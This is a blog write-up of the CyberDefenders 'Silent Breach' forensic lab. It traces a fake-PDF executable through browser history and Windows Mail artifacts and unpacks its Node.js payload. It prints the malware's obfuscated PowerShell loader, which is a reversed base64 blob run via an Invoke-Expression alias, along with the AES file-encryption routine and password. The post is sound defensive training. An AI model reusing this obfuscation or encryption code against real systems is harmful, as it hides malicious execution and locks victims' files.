Forem: Sevenzo The latest articles on Forem by Sevenzo (@7z0). https://forem.com/7z0 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3857494%2F55af79ca-6e35-4408-a376-38eb64a24c30.jpg Forem: Sevenzo https://forem.com/7z0 en CyberDefenders - Silent Breach WriteUp Sevenzo Thu, 02 Apr 2026 15:38:44 +0000 https://forem.com/7z0/cyberdefenders-silent-breach-writeup-hh1 https://forem.com/7z0/cyberdefenders-silent-breach-writeup-hh1 <p><strong>Lab</strong>: <a href="https://cyberdefenders.org/blueteam-ctf-challenges/silent-breach/" rel="noopener noreferrer">https://cyberdefenders.org/blueteam-ctf-challenges/silent-breach/</a></p> <p><strong>1. What is the MD5 hash of the potentially malicious EXE file the user downloaded?</strong><br><br> Navigating to the Downloads' folder we can see right way a suspicious executable which attempts to camouflage as a PDF. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1oirk218zd6u50sp4t20.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1oirk218zd6u50sp4t20.png" alt=" " width="800" height="470"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-FileHash</span><span class="w"> </span><span class="nt">-Algorithm</span><span class="w"> </span><span class="nx">md5</span><span class="w"> </span><span class="o">.</span><span class="nx">\IMF-Info.pdf.exe</span><span class="w"> </span></code></pre> </div> <p> Answer <p>336A7CF476EBC7548C93507339196ABB</p> </p> <p><strong>2. What is the URL from which the file was downloaded?</strong><br><br> Since it has the Zone.Identifier metada it means the MOTW was applied to the file, therefore there are high changes this file was download via a browser.<br><br> Accordingly with Microsoft <a href="https://learn.microsoft.com/en-us/dotnet/api/system.security.securityzone?view=windowsdesktop-10.0" rel="noopener noreferrer">https://learn.microsoft.com/en-us/dotnet/api/system.security.securityzone?view=windowsdesktop-10.0</a> we also know with "ZoneId=3" that the file was download from the internet.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F723tn7cpu2pra00tm39d.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F723tn7cpu2pra00tm39d.png" alt=" " width="800" height="448"></a></p> <p> Answer <code>http://192.168.16.128:8000/IMF-Info.pdf.exe</code> </p> <p><strong>3. What application did the user use to download this file?</strong><br><br> Due to previous discoveries we will check the <em>History</em> file from the installed browsers:</p> <p>Exported the <strong>History</strong> file from the Edge browser. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjxbffeywaxkbh5zbyici.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjxbffeywaxkbh5zbyici.png" alt=" " width="800" height="348"></a></p> <p>Open the file in SQLite and browsed the "downloads" Table. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7q2n659eu20brysk5cnc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7q2n659eu20brysk5cnc.png" alt=" " width="800" height="200"></a></p> <p>There were in total 5 files downloaded from the suspicious URL, which matches with the suspicious filename found earlier.</p> <p> Answer <p>Microsoft Edge</p> </p> <p><strong>4. By examining Windows Mail artifacts, we found an email address mentioning three IP addresses of servers that are at risk or compromised. What are the IP addresses?</strong><br><br> Checking the artifact "HxStore.hxd" that can be found in the following path "%LOCALAPPDATA%\Packages\Microsoft.windowscommunicationsapps_...\LocalState" we can retrieve additional information related to the windows mail app. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fre7w3otnq5s5y90gjjl7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fre7w3otnq5s5y90gjjl7.png" alt=" " width="800" height="422"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">strings.exe</span><span class="w"> </span><span class="o">.</span><span class="nx">\HxStore.hxd</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'\b(?:\d{1,3}\.){3}\d{1,3}\b'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nt">-Uniq</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5dkwlnzpa5aktyc3ann.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5dkwlnzpa5aktyc3ann.png" alt=" " width="800" height="105"></a></p> <p> Answer <p>192.168.16.128, 212.33.10.112, 145.67.29.88</p> </p> <p><strong>5. By examining the malicious executable, we found that it uses an obfuscated PowerShell script to decrypt specific files. What predefined password does the script use for encryption?</strong><br><br> Starting by doing some static analysis with DiE we can identify tha packer used and the language used. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx5byna7btevmfvavzvvf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx5byna7btevmfvavzvvf.png" alt=" " width="800" height="522"></a></p> <p>This malware was written in Node.js and then packed as a PE to run without the need to have Node.js installed. By researching a bit we figure out a repository vercel/pkg which takes js (node.js) code, and compiles it into v8 bytecode wrapping it into an executable.<br><br> After searching for available unpackers we can find the following repo: <a href="https://github.com/LockBlock-dev/pkg-unpacker" rel="noopener noreferrer">https://github.com/LockBlock-dev/pkg-unpacker</a>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">npm</span><span class="w"> </span><span class="nx">start</span><span class="w"> </span><span class="o">--</span><span class="w"> </span><span class="nt">-i</span><span class="w"> </span><span class="o">.</span><span class="nx">/pkg_app.exe</span><span class="w"> </span><span class="nt">-o</span><span class="w"> </span><span class="o">.</span><span class="nx">/unpacked</span><span class="w"> </span></code></pre> </div> <p>Now we can run <em>strings</em> against it without getting much rubbish.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">strings.exe</span><span class="w"> </span><span class="o">.</span><span class="nx">\main.js</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdaexsq4o42z5z0nd62sm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdaexsq4o42z5z0nd62sm.png" alt=" " width="800" height="480"></a></p> <p>Saving it to a file and cleaning the rubbish we get the following code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$wy7qIGPnm36HpvjrL2TMUaRbz</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"K0QfK0QZjJ3bG1CIlxWaGRXdw5WakASblRXStUmdv1WZSBCIgAiCNoQDpgSZz9GbD5SbhVmc0NFd19GJgACIgoQDpgSZz9GbD5SbhVmc0N1b0BXeyNGJgACIgoQDK0QKos2YvxmQsFmbpZEazVHbG5SbhVmc0N1b0BXeyNGJgACIgoQDpgGdn5WZM5yclRXeC5WahxGckACLwACLzVGd5JkbpFGbwRCKlRXaydlLtFWZyR3UvRHc5J3YkACIgAiCNoQDpUGdpJ3V6oTXlR2bN1WYlJHdT9GdwlncD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBCLy9Gdwlncj5WZkACLtFWZyR3U0V3bkgSbhVmc0N1b0BXeyNkL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3UvRHc5J3YkACIgAiCNkSZ0FWZyNkO60VZk9WTlxWaG5yTJ5SblR3c5N1WgwSZslmR0VHc0V3bkgSbhVmc0NVZslmRu8USu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3U0V3bkACIgAiCNoQDpUGbpZEd1BnbpRCKzVGd5JEbsFEZhVmU6oTXlxWaG5yTJ5SblR3c5N1Wg0DIzVGd5JkbpFGbwRCIgACIK0gCNkCKy9Gdwlncj5WRlRXYlJ3QuMXZhRCI9AicvRHc5J3YuVGJgACIgoQDK0wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1Wg0DIn5WakRWYQ5yclFGJgACIgoQDDJ0Q6oTXlR2bNJXZoBXaD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgUGZv1kLzVWYkACIgAiCNYXakASPgYVSuMXZhRCIgACIK0QeltGJg0DI5V2SuMXZhRCIgACIK0QKoUGdhVmcDpjOdNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgMXZhRCIgACIK0gCNcyYuVmLnACLnQiZkBnLcdCIlNWYsBXZy1CIlxWaGRXdw5WakASPgUGbpZEd1BHd19GJgACIgoQD7BSKzVGbpZEd1BnbpRCIulGIlxWaGRXdw5WakgCIoNWYlJ3bmpQDK0QKK0gImRGcu42bpN3cp1ULG1UScxFcvR3azVGRcxlbhhGdlxFXzJXZzVFXcpzQiACIgAiCNwiImRGcuQXZyNWZT1iRNlEXcB3b0t2clREXc5WYoRXZcx1cyV2cVxFX6MkIgACIgoQDoAEI9AyclxWaGRXdw5WakoQDzVGbpZGI0VHculGIm9GI0NXaMByIK0gCNkSZ6l2U2lGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgYXakoQDpUmepNVeltGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgkXZrRiCNkycu9Wa0FmclRXakACL0xWYzRCIsQmcvd3czFGckgyclRXeCVmdpJXZEhTO4IzYmJlL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DIzVGd5JUZ2lmclRGJK0gCNAiNxASPgUmepNldpRiCNACIgIzMg0DIlpXaTlXZrRiCNADMwATMg0DIz52bpRXYyVGdpRiCNkCOwgHMscDM4BDL2ADewwSNwgHMsQDM4BDLzADewwiMwgHMsEDM4BDKd11WlRXeCtFI9ACdsF2ckoQDiQyYlNVNyAjMj8mZuFiZtlkIg0DIkJ3b3N3chBHJ"</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="nv">$9U5RgiwHSYtbsoLuD3Vf6</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$wy7qIGPnm36HpvjrL2TMUaRbz</span><span class="o">.</span><span class="nf">ToCharArray</span><span class="p">()</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="p">[</span><span class="n">array</span><span class="p">]::</span><span class="n">Reverse</span><span class="p">(</span><span class="nv">$9U5RgiwHSYtbsoLuD3Vf6</span><span class="p">)</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="o">-join</span><span class="w"> </span><span class="nv">$9U5RgiwHSYtbsoLuD3Vf6</span><span class="w"> </span><span class="mi">2</span><span class="err">&gt;</span><span class="o">&amp;</span><span class="mi">1</span><span class="err">&gt;</span><span class="w"> </span><span class="bp">$null</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="nv">$FHG7xpKlVqaDNgu1c2Utw</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">systeM.tEXT.ENCODIng</span><span class="p">]::</span><span class="n">uTf8.geTStRInG</span><span class="p">([</span><span class="n">sYsTeM.CoNVeRt</span><span class="p">]::</span><span class="n">FROMBase64StRIng</span><span class="p">(</span><span class="s2">"</span><span class="nv">$9U5RgiwHSYtbsoLuD3Vf6</span><span class="s2">"</span><span class="p">))</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="nv">$9ozWfHXdm8eIBYru</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"InV"</span><span class="o">+</span><span class="s2">"okE"</span><span class="o">+</span><span class="s2">"-ex"</span><span class="o">+</span><span class="s2">"prE"</span><span class="o">+</span><span class="s2">"SsI"</span><span class="o">+</span><span class="s2">"ON"</span><span class="p">;</span><span class="w"> </span><span class="n">new-aliaS</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nx">PwN</span><span class="w"> </span><span class="nt">-ValUe</span><span class="w"> </span><span class="nv">$9ozWfHXdm8eIBYru</span><span class="w"> </span><span class="nt">-fOrce</span><span class="p">;</span><span class="w"> </span><span class="n">pwn</span><span class="w"> </span><span class="nv">$FHG7xpKlVqaDNgu1c2Utw</span><span class="p">;</span><span class="w"> </span></code></pre> </div> <p>To analyse the script I will use Powershell_ISE, I will set a breakpoint in the last line since it is the one that will actually execute the obfuscated code. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpdhxxpxocesfbtw48dap.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpdhxxpxocesfbtw48dap.png" alt=" " width="800" height="455"></a></p> <p> Answer <p>Imf!nfo#2025Sec$</p> </p> <p><strong>6. After identifying how the script works, decrypt the files and submit the secret string.</strong></p> <p>Before analysing it, let's now save this de-obfuscated code into <em>main2.ps1</em> to have a better readability.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">echo</span><span class="w"> </span><span class="nv">$FHG7xpKlVqaDNgu1c2Utw</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="nx">main2.ps1</span><span class="w"> </span></code></pre> </div> <p>Looking back at the PS code we find two new artifacts: <em>IMF-Secret.pdf</em> and <em>IMF-Mission.pdf</em> which the code is encrypting using the AES algorithm. </p> <p>Going to FTK-Imager we can find those files, let's extract them so we can decrypt them.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0yz14jy933c9bapkjv15.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0yz14jy933c9bapkjv15.png" alt=" " width="800" height="255"></a></p> <p>To decrypt the files I read the following documentation: <a href="https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-10.0" rel="noopener noreferrer">https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-10.0</a>.<br><br> Just by adjusting the code to point to our paths and adding running the <em>CreateEncryptor()</em> function did the trick. Here is the code that I used with my modifications:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$password</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"Imf!nfo#2025Sec$"</span><span class="w"> </span><span class="nv">$salt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">Byte</span><span class="p">[]](</span><span class="mi">0</span><span class="n">x01</span><span class="p">,</span><span class="nx">0x02</span><span class="p">,</span><span class="nx">0x03</span><span class="p">,</span><span class="nx">0x04</span><span class="p">,</span><span class="nx">0x05</span><span class="p">,</span><span class="nx">0x06</span><span class="p">,</span><span class="nx">0x07</span><span class="p">,</span><span class="nx">0x08</span><span class="p">)</span><span class="w"> </span><span class="nv">$iterations</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">10000</span><span class="w"> </span><span class="nv">$keySize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">32</span><span class="w"> </span><span class="nv">$ivSize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">16</span><span class="w"> </span><span class="nv">$deriveBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Security.Cryptography.Rfc2898DeriveBytes</span><span class="p">(</span><span class="nv">$password</span><span class="p">,</span><span class="w"> </span><span class="nv">$salt</span><span class="p">,</span><span class="w"> </span><span class="nv">$iterations</span><span class="p">)</span><span class="w"> </span><span class="nv">$key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$deriveBytes</span><span class="o">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="nv">$keySize</span><span class="p">)</span><span class="w"> </span><span class="nv">$iv</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$deriveBytes</span><span class="o">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="nv">$ivSize</span><span class="p">)</span><span class="w"> </span><span class="c"># List of input files</span><span class="w"> </span><span class="bp">$input</span><span class="n">Files</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">@(</span><span class="w"> </span><span class="s2">"C:\\Users\\Rev\Desktop\\Silent_Breach\\IMF-Secret.enc"</span><span class="p">,</span><span class="w"> </span><span class="c"># POINT TO MY FPATH</span><span class="w"> </span><span class="s2">"C:\\Users\\Rev\\Desktop\\Silent_Breach\\IMF-Mission.enc"</span><span class="w"> </span><span class="c"># POINT TO MY FPATH</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="kr">foreach</span><span class="w"> </span><span class="p">(</span><span class="bp">$input</span><span class="n">File</span><span class="w"> </span><span class="nx">in</span><span class="w"> </span><span class="bp">$input</span><span class="nx">Files</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c">#$outputFile = $inputFile -replace '\.pdf$', '.enc'</span><span class="w"> </span><span class="nv">$outputFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="bp">$input</span><span class="n">File</span><span class="w"> </span><span class="o">-replace</span><span class="w"> </span><span class="s1">'\.enc$'</span><span class="p">,</span><span class="w"> </span><span class="s1">'.pdf'</span><span class="w"> </span><span class="c"># SWITCH THE LOGIC, I HAVE THE ENC FILES</span><span class="w"> </span><span class="nv">$aes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Security.Cryptography.Aes</span><span class="p">]::</span><span class="n">Create</span><span class="p">()</span><span class="w"> </span><span class="nv">$aes</span><span class="o">.</span><span class="nf">Key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$key</span><span class="w"> </span><span class="nv">$aes</span><span class="o">.</span><span class="nf">IV</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$iv</span><span class="w"> </span><span class="nv">$aes</span><span class="o">.</span><span class="nf">Mode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Security.Cryptography.CipherMode</span><span class="p">]::</span><span class="n">CBC</span><span class="w"> </span><span class="nv">$aes</span><span class="o">.</span><span class="nf">Padding</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Security.Cryptography.PaddingMode</span><span class="p">]::</span><span class="n">PKCS7</span><span class="w"> </span><span class="c">#$encryptor = $aes.CreateEncryptor()</span><span class="w"> </span><span class="nv">$encryptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$aes</span><span class="o">.</span><span class="nf">CreateDecryptor</span><span class="p">()</span><span class="w"> </span><span class="c"># CreateDecryptor() is the function that we need</span><span class="w"> </span><span class="nv">$plainBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.IO.File</span><span class="p">]::</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="bp">$input</span><span class="n">File</span><span class="p">)</span><span class="w"> </span><span class="nv">$outStream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.IO.FileStream</span><span class="p">(</span><span class="nv">$outputFile</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.IO.FileMode</span><span class="p">]::</span><span class="n">Create</span><span class="p">)</span><span class="w"> </span><span class="nv">$cryptoStream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Security.Cryptography.CryptoStream</span><span class="p">(</span><span class="nv">$outStream</span><span class="p">,</span><span class="w"> </span><span class="nv">$encryptor</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Security.Cryptography.CryptoStreamMode</span><span class="p">]::</span><span class="n">Write</span><span class="p">)</span><span class="w"> </span><span class="nv">$cryptoStream</span><span class="o">.</span><span class="nf">Write</span><span class="p">(</span><span class="nv">$plainBytes</span><span class="p">,</span><span class="w"> </span><span class="nx">0</span><span class="p">,</span><span class="w"> </span><span class="nv">$plainBytes</span><span class="o">.</span><span class="nf">Length</span><span class="p">)</span><span class="w"> </span><span class="nv">$cryptoStream</span><span class="o">.</span><span class="nf">FlushFinalBlock</span><span class="p">()</span><span class="w"> </span><span class="nv">$cryptoStream</span><span class="o">.</span><span class="nf">Close</span><span class="p">()</span><span class="w"> </span><span class="nv">$outStream</span><span class="o">.</span><span class="nf">Close</span><span class="p">()</span><span class="w"> </span><span class="n">Remove-Item</span><span class="w"> </span><span class="bp">$input</span><span class="nx">File</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vnw5u1u4u8mwnkzh8xn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vnw5u1u4u8mwnkzh8xn.png" alt=" " width="800" height="607"></a></p> <p> Answer <p>CyberDefenders{N3v3r_eX3cuTe_F!l3$<em>dOwnL0ded_fr0m_M@lic10u5</em>$erV3r}</p> </p> cyberdefenders writeup silentbreach hxstore